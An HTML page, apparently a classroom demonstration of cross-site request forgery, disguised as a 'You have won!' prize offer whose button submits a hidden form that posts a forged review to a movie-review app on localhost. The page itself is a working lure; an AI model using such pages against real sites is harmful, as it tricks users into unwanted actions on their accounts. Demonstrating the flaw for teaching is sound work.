<!DOCTYPE html>
<html>
  <head>
    <title>An offer you can't refuse</title>
    <style>
      body {
        min-height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        background-color: #eee;
        font-family: sans-serif;
      }

      .prize {
        max-width: 30em;
        background-color: white;
        padding: 1em;
      }

      button {
        padding: 1em;
        background-color: #f0f;
        border-width: 0;
        color: white;
        font-size: 1.4em;
        cursor: pointer;
        width: 100%;
      }

      button:hover {
        background-color: #0ff;
      }

      button:hover:after {
        content: " \1F389";
        display: inline-block;
        margin-left: 0.5em;
      }

      button:hover:before {
        content: "\1F389 ";
        display: inline-block;
        margin-right: 0.5em;
      }

    </style>
  </head>
  <body>
    <div class="prize">
    <h1>You have won!</h1>
    <p>
      Click this big happy button to claim your prize!
    </p>
    <form method="POST" action="http://localhost:5080/movies/2/reviews">
      <input type="hidden" name="name" value="CSRF Hacker">
      <input type="hidden" name="comment" value="This is a review from other site. I have been hacked!">
      <button onclick="document.querySelector('form').submit()">Gimme coupon now!</button>
    </form>
  </div>
  </body>
</html>
